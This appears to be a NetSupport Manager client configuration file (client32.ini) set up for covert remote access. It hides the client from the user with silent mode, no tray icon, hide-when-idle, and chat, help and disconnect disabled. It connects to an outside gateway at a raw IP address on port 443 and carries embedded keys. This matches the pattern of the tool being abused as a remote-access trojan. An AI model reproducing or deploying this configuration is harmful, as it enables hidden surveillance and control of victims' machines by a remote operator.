0xc025683f

[Client]
_present=1
AlwaysOnTop=1
DisableChat=1
DisableChatMenu=1
DisableClientConnect=1
DisableCloseApps=0
DisableDisconnect=1
DisableManageServices=0
DisableReplayMenu=1
DisableRequestHelp=1
HideWhenIdle=1
Protocols=3
RoomSpec=Eval
SecurityKey2=dgAAAOEuXqDAwXVfYalJMcCwXn4A
silent=1
SKMode=1
SysTray=0
UnloadMirrorOnDisconnect=1
Usernames=*

[_Info]
Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini

[_License]
quiet=1

[Audio]
DisableAudioFilter=1

[Bridge]
Modem=SSTP

[General]
BeepUsingSpeaker=0

[HTTP]
GatewayAddress=185.225.75.33:443
GSK=DMGP:C=F@GEDHH<O@AEC:I?IDJ9E
Port=443
